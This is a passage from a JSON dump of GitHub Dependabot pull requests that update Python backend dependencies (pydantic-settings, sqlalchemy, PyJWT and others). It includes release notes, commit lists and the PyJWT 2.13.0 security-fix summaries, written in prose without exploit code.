href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/794\"\u003epydantic/pydantic-settings#794\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix env_file from model_config ignored in CliApp.run() (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/795\"\u003e#795\u003c/a\u003e) by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/796\"\u003epydantic/pydantic-settings#796\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate dependencies by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/798\"\u003epydantic/pydantic-settings#798\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd Dependabot configuration by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/801\"\u003epydantic/pydantic-settings#801\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump samuelcolvin/check-python-version from 4.1 to 5 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/802\"\u003epydantic/pydantic-settings#802\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump actions/upload-artifact from 4 to 7 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/803\"\u003epydantic/pydantic-settings#803\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump actions/checkout from 4 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/804\"\u003epydantic/pydantic-settings#804\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump astral-sh/setup-uv from 5 to 7 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/805\"\u003epydantic/pydantic-settings#805\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump actions/setup-python from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/806\"\u003epydantic/pydantic-settings#806\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eIgnore chardet and group GitHub Actions in Dependabot by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/808\"\u003epydantic/pydantic-settings#808\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump actions/download-artifact from 4 to 8 in the github-actions group by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/809\"\u003epydantic/pydantic-settings#809\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the python-packages group with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/810\"\u003epydantic/pydantic-settings#810\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport reading .env files from FIFOs (e.g. 1Password Environments) by \u003ca href=\"https://github.com/JacobHayes\"\u003e\u003ccode\u003e@​JacobHayes\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/776\"\u003epydantic/pydantic-settings#776\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix AliasChoices ignored when changing provider priority by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/813\"\u003epydantic/pydantic-settings#813\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: resolve KeyError in run_subcommand for underscore field names by \u003ca href=\"https://github.com/bradykieffer\"\u003e\u003ccode\u003e@​bradykieffer\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/799\"\u003epydantic/pydantic-settings#799\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the python-packages group with 3 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/814\"\u003epydantic/pydantic-settings#814\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003eLiteral[numeric Enum]\u003c/code\u003e coercion for CLI and env vars by \u003ca href=\"https://github.com/m9810223\"\u003e\u003ccode\u003e@​m9810223\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/811\"\u003epydantic/pydantic-settings#811\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix nested discriminated unions not discovered by env/CLI providers by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/816\"\u003epydantic/pydantic-settings#816\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the python-packages group with 3 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/820\"\u003epydantic/pydantic-settings#820\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCLI ensure env nested max split internally. by \u003ca href=\"https://github.com/kschwab\"\u003e\u003ccode\u003e@​kschwab\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/821\"\u003epydantic/pydantic-settings#821\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the python-packages group with 4 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/824\"\u003epydantic/pydantic-settings#824\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMigrate \u003ccode\u003eboto3-stubs\u003c/code\u003e to \u003ccode\u003etypes-boto3\u003c/code\u003e by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/831\"\u003epydantic/pydantic-settings#831\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix CLI not recognizing field name with validate_by_name and AliasChoices by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/826\"\u003epydantic/pydantic-settings#826\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAllow customisation of the dotevn setting source to filter variables by \u003ca href=\"https://github.com/CaselIT\"\u003e\u003ccode\u003e@​CaselIT\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/832\"\u003epydantic/pydantic-settings#832\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the python-packages group with 3 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/833\"\u003epydantic/pydantic-settings#833\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eIntroduce yamlfmt by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/836\"\u003epydantic/pydantic-settings#836\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump boto3 from 1.42.82 to 1.42.83 in the python-packages group by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/837\"\u003epydantic/pydantic-settings#837\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eIntroduce zizmor by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/838\"\u003epydantic/pydantic-settings#838\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix CliPositionalArg[list[CustomType]] crash for custom types by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/839\"\u003epydantic/pydantic-settings#839\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd note about Mypy plugin for \u003ccode\u003eBaseSettings.__init__()\u003c/code\u003e by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/842\"\u003epydantic/pydantic-settings#842\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecli_ignore_unknown_args=True\u003c/code\u003e not working on subcommands by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/844\"\u003epydantic/pydantic-settings#844\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the python-packages group with 4 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/847\"\u003epydantic/pydantic-settings#847\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix CLI descriptions lost under \u003ccode\u003epython -OO\u003c/code\u003e by falling back to \u003ccode\u003ejson_schema_extra\u003c/code\u003e by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/843\"\u003epydantic/pydantic-settings#843\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePrepare release 2.14.0 by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/848\"\u003epydantic/pydantic-settings#848\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/e95c30bec8cfaee88ee275138c064aea97a25bdf\"\u003e\u003ccode\u003ee95c30b\u003c/code\u003e\u003c/a\u003e Prepare release 2.14.1 (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/859\"\u003e#859\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/0c8734581b6cf70a995afad603ac456631d00621\"\u003e\u003ccode\u003e0c87345\u003c/code\u003e\u003c/a\u003e Fix field named \u003ccode\u003ecls\u003c/code\u003e conflicting with classmethod parameter (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/858\"\u003e#858\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/7bd0072795a800065b42210b6dca90fc9b83daf7\"\u003e\u003ccode\u003e7bd0072\u003c/code\u003e\u003c/a\u003e Bump the python-packages group with 2 updates (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/856\"\u003e#856\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/b03e573d017ed48e1c2774a5e0b715db9766c76b\"\u003e\u003ccode\u003eb03e573\u003c/code\u003e\u003c/a\u003e Bump the github-actions group with 3 updates (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/853\"\u003e#853\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/eaa3b434938411ec8a3717ea646614561e713f51\"\u003e\u003ccode\u003eeaa3b43\u003c/code\u003e\u003c/a\u003e Bump the python-packages group with 5 updates (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/854\"\u003e#854\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/9f95615c24c6813c1d7d203576581a79cb6d9e8e\"\u003e\u003ccode\u003e9f95615\u003c/code\u003e\u003c/a\u003e Bump the python-packages group with 4 updates (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/850\"\u003e#850\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/8916beeecc6d0510e3d0532a0ed839937400ddc3\"\u003e\u003ccode\u003e8916bee\u003c/code\u003e\u003c/a\u003e Prepare release 2.14.0 (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/848\"\u003e#848\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/39e551c0910c85505b608ff85a103b2c9f7396c5\"\u003e\u003ccode\u003e39e551c\u003c/code\u003e\u003c/a\u003e Fix CLI descriptions lost under \u003ccode\u003epython -OO\u003c/code\u003e by falling back to `json_schema_...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/9ed7f48ea2c90f436a03b01f721fe6656c869b14\"\u003e\u003ccode\u003e9ed7f48\u003c/code\u003e\u003c/a\u003e Bump the python-packages group with 4 updates (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/847\"\u003e#847\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/617c690fb16c95eb0fb98fc88c0d6d82b9af4fa9\"\u003e\u003ccode\u003e617c690\u003c/code\u003e\u003c/a\u003e Fix \u003ccode\u003ecli_ignore_unknown_args=True\u003c/code\u003e not working on subcommands (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/844\"\u003e#844\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pydantic/pydantic-settings/compare/v2.13.1...v2.14.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `sqlalchemy` from 2.0.49 to 2.0.50\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sqlalchemy/sqlalchemy/releases\"\u003esqlalchemy's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e2.0.50\u003c/h1\u003e\n\u003cp\u003eReleased: May 24, 2026\u003c/p\u003e\n\u003ch2\u003eorm\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[orm] [bug]\u003c/strong\u003e Fixed issue where using \u003ccode\u003e_orm.joinedload()\u003c/code\u003e with\n\u003ccode\u003ePropComparator.of_type()\u003c/code\u003e targeting a joined-table subclass combined\nwith \u003ccode\u003ePropComparator.and_()\u003c/code\u003e referencing a column on that subclass\nwould generate invalid SQL, where the subclass column was not adapted to\nthe subquery alias.  Pull request courtesy Joaquin Hui Gomez.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://www.sqlalchemy.org/trac/ticket/13203\"\u003e#13203\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[orm] [bug]\u003c/strong\u003e Fixed issue where the presence of a \u003ccode\u003eSessionEvents.do_orm_execute()\u003c/code\u003e\nevent hook would cause internal execution options such as \u003ccode\u003eyield_per\u003c/code\u003e and\nloader-specific state from the first \u003ccode\u003eorm_pre_session_exec\u003c/code\u003e pass to leak\ninto the second pass, leading to errors when using relationship loaders\nsuch as \u003ccode\u003eselectinload()\u003c/code\u003e and \u003ccode\u003eimmediateload()\u003c/code\u003e.  The execution\noptions passed to the second compilation pass are now based on the original\noptions plus only the explicit updates made via\n\u003ccode\u003eORMExecuteState.update_execution_options()\u003c/code\u003e within the event hook.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://www.sqlalchemy.org/trac/ticket/13301\"\u003e#13301\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[orm] [bug]\u003c/strong\u003e Fixed issue where using \u003ccode\u003e_orm.with_polymorphic()\u003c/code\u003e on a leaf class (a\nsubclass with no further descendants) or a non-inherited class would fail\nwith an \u003ccode\u003eAttributeError\u003c/code\u003e when used in an ORM statement, due to\n\u003ccode\u003e_orm.configure_mappers()\u003c/code\u003e not being triggered implicitly. The fix\nensures that \u003ccode\u003eAliasedInsp\u003c/code\u003e participates in the \u003ccode\u003e_post_inspect\u003c/code\u003e\nhook, triggering mapper configuration during ORM statement compilation.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://www.sqlalchemy.org/trac/ticket/13319\"\u003e#13319\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esql\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[sql] [bug]\u003c/strong\u003e Fixed issue where floor division (\u003ccode\u003e//\u003c/code\u003e) between a \u003ccode\u003eFloat\u003c/code\u003e or\n\u003ccode\u003eNumeric\u003c/code\u003e numerator and an \u003ccode\u003eInteger\u003c/code\u003e denominator would omit\nthe \u003ccode\u003eFLOOR()\u003c/code\u003e SQL wrapper on dialects where\n\u003ccode\u003eDialect.div_is_floordiv\u003c/code\u003e is \u003ccode\u003eTrue\u003c/code\u003e (the default, including\nPostgreSQL and SQLite).  \u003ccode\u003eFLOOR()\u003c/code\u003e is now applied if either the\ndenominator or the numerator is a non-integer, so that expressions such as\n\u003ccode\u003efloat_col // int_col\u003c/code\u003e render as \u003ccode\u003eFLOOR(float_col / int_col)\u003c/code\u003e instead\nof the incorrect \u003ccode\u003efloat_col / int_col\u003c/code\u003e.  Pull request courtesy r266-tech.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://www.sqlalchemy.org/trac/ticket/10528\"\u003e#10528\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003epostgresql\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/sqlalchemy/sqlalchemy/commits\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pyjwt` from 2.12.1 to 2.13.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/releases\"\u003epyjwt's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.13.0\u003c/h2\u003e\n\u003ch1\u003ePyJWT 2.13.0 — Security Release\u003c/h1\u003e\n\u003cp\u003eThis release bundles five security fixes plus three additional hardening / spec-compliance changes. We recommend all users upgrade.\u003c/p\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\"\u003e\u003ccode\u003eGHSA-xgmm-8j9v-c9wx\u003c/code\u003e\u003c/a\u003e — JWK JSON accepted as HMAC secret (algorithm confusion).\u003c/strong\u003e \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e previously rejected PEM- and SSH-formatted asymmetric keys but did not catch a JWK passed as a raw JSON string. In a verifier configured with both symmetric and asymmetric algorithms in \u003ccode\u003ealgorithms=[…]\u003c/code\u003e and a raw-JSON JWK as the key, an attacker could forge HS256 tokens using the JWK text as the HMAC secret. The guard has been extended to reject any JWK-shaped JSON. \u003cem\u003eReported by \u003ca href=\"https://github.com/aradona91\"\u003e\u003ccode\u003e@​aradona91\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\"\u003e\u003ccode\u003eGHSA-jq35-7prp-9v3f\u003c/code\u003e\u003c/a\u003e — Algorithm allow-list bypass with \u003ccode\u003ePyJWK\u003c/code\u003e / \u003ccode\u003ePyJWKClient\u003c/code\u003e.\u003c/strong\u003e When verifying with a \u003ccode\u003ePyJWK\u003c/code\u003e, the caller's \u003ccode\u003ealgorithms=[…]\u003c/code\u003e allow-list was checked against the token header \u003ccode\u003ealg\u003c/code\u003e as a string only; actual verification used the algorithm bound to the \u003ccode\u003ePyJWK\u003c/code\u003e. An attacker who controlled a registered JWKS key could sign with one algorithm and advertise another on the header. PyJWT now requires the token header \u003ccode\u003ealg\u003c/code\u003e to match the \u003ccode\u003ePyJWK\u003c/code\u003e's algorithm before verification. \u003cem\u003eReported by \u003ca href=\"https://github.com/sushi-gif\"\u003e\u003ccode\u003e@​sushi-gif\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\"\u003e\u003ccode\u003eGHSA-w7vc-732c-9m39\u003c/code\u003e\u003c/a\u003e — DoS via base64 decode of unused payload segment when \u003ccode\u003eb64=false\u003c/code\u003e.\u003c/strong\u003e For detached-payload JWS (\u003ccode\u003eb64=false\u003c/code\u003e), the compact-form payload segment was base64-decoded before being discarded in favor of the caller-supplied \u003ccode\u003edetached_payload\u003c/code\u003e. An attacker could inflate the unused segment to force CPU + me...\n\n_Description has been truncated_\n\n\u003c!-- This is an auto-generated description by cubic. --\u003e\n---\n## Summary by cubic\nUpdate backend dependencies to current patch/minor versions for security and stability. Highlights include `fastapi` 0.136.3, `uvicorn` 0.49.0, and `PyJWT` 2.13.0.\n\n- **Dependencies**\n  - Runtime: `fastapi` 0.136.3, `uvicorn` 0.49.0, `PyJWT` 2.13.0, `pydantic-settings` 2.14.1, `sqlalchemy` 2.0.50, `python-multipart` 0.0.32, `redis` 7.4.1, `sentry-sdk` 2.62.0, `webauthn` 2.8.0, `reportlab` 4.5.1.\n  - Tooling/tests: `ruff` 0.15.17, `mypy` 1.20.2, `coverage` 7.14.1, `pip-audit` 2.10.1, `pytest` 9.1.0.\n  - Notable changes:\n    - `PyJWT` 2.13.0 includes multiple security fixes and stricter algorithm checks.\n    - `fastapi` now rejects underscore headers when `convert_underscores=True` (default) and validates SSE fields.\n    - `uvicorn` consumes duplicate forwarding headers and requires `httptools` ≥ 0.8.0.\n\n- **Migration**\n  - Ensure clients and proxies send header names with dashes, not underscores (e.g., `X-Custom-Header`).\n  - If behind proxies using multiple `X-Forwarded-*` headers, verify client IP/port handling with `ProxyHeadersMiddleware`.\n  - Confirm JWT verification paths pass an explicit `algorithms=[...]` list and work with `PyJWK`/`PyJWKClient`.\n  - Reinstall deps: `pip install -r backend/requirements.txt` and `-r backend/requirements-ci.txt`. Run tests.\n\n\u003csup\u003eWritten for commit 6a6e38e56aa87a35ef257d8afe32876efbc8f062. Summary will update on new commits.\u003c/sup\u003e\n\n\u003ca href=\"https://cubic.dev/pr/Prekzursil/momentstudio/pull/585?utm_source=github\" target=\"_blank\" rel=\"noopener noreferrer\" data-no-image-dialog=\"true\"\u003e\u003cpicture\u003e\u003csource media=\"(prefers-color-scheme: dark)\" srcset=\"https://www.cubic.dev/buttons/review-in-cubic-dark.svg\"\u003e\u003csource media=\"(prefers-color-scheme: light)\" srcset=\"https://www.cubic.dev/buttons/review-in-cubic-light.svg\"\u003e\u003cimg alt=\"Review in cubic\" src=\"https://www.cubic.dev/buttons/review-in-cubic-dark.svg\"\u003e\u003c/picture\u003e\u003c/a\u003e\n\n\u003c!-- End of auto-generated description by cubic. --\u003e\n\n","html_url":"https://github.com/Prekzursil/momentstudio/pull/585","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Prekzursil%2Fmomentstudio/issues/585","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/585/packages"},{"uuid":"4652439820","node_id":"PR_kwDOSZI7Z87l6y3p","number":348,"state":"open","title":"chore(deps): update pyjwt requirement from \u003e=2.12.1 to \u003e=2.13.0 in /apps/counselconduit","user":"dependabot[bot]","labels":["dependencies"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-06-12T20:35:37.000Z","updated_at":"2026-06-12T20:35:38.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): update","packages":[{"name":"pyjwt","old_version":"\u003e=2.12.1","new_version":"\u003e=2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"}],"path":"/apps/counselconduit","ecosystem":"pip"},"body":"Updates the requirements on [pyjwt](https://github.com/jpadilla/pyjwt) to permit the latest version.\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/releases\"\u003epyjwt's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.13.0\u003c/h2\u003e\n\u003ch1\u003ePyJWT 2.13.0 — Security Release\u003c/h1\u003e\n\u003cp\u003eThis release bundles five security fixes plus three additional hardening / spec-compliance changes. We recommend all users upgrade.\u003c/p\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\"\u003e\u003ccode\u003eGHSA-xgmm-8j9v-c9wx\u003c/code\u003e\u003c/a\u003e — JWK JSON accepted as HMAC secret (algorithm confusion).\u003c/strong\u003e \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e previously rejected PEM- and SSH-formatted asymmetric keys but did not catch a JWK passed as a raw JSON string. In a verifier configured with both symmetric and asymmetric algorithms in \u003ccode\u003ealgorithms=[…]\u003c/code\u003e and a raw-JSON JWK as the key, an attacker could forge HS256 tokens using the JWK text as the HMAC secret. The guard has been extended to reject any JWK-shaped JSON. \u003cem\u003eReported by \u003ca href=\"https://github.com/aradona91\"\u003e\u003ccode\u003e@​aradona91\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\"\u003e\u003ccode\u003eGHSA-jq35-7prp-9v3f\u003c/code\u003e\u003c/a\u003e — Algorithm allow-list bypass with \u003ccode\u003ePyJWK\u003c/code\u003e / \u003ccode\u003ePyJWKClient\u003c/code\u003e.\u003c/strong\u003e When verifying with a \u003ccode\u003ePyJWK\u003c/code\u003e, the caller's \u003ccode\u003ealgorithms=[…]\u003c/code\u003e allow-list was checked against the token header \u003ccode\u003ealg\u003c/code\u003e as a string only; actual verification used the algorithm bound to the 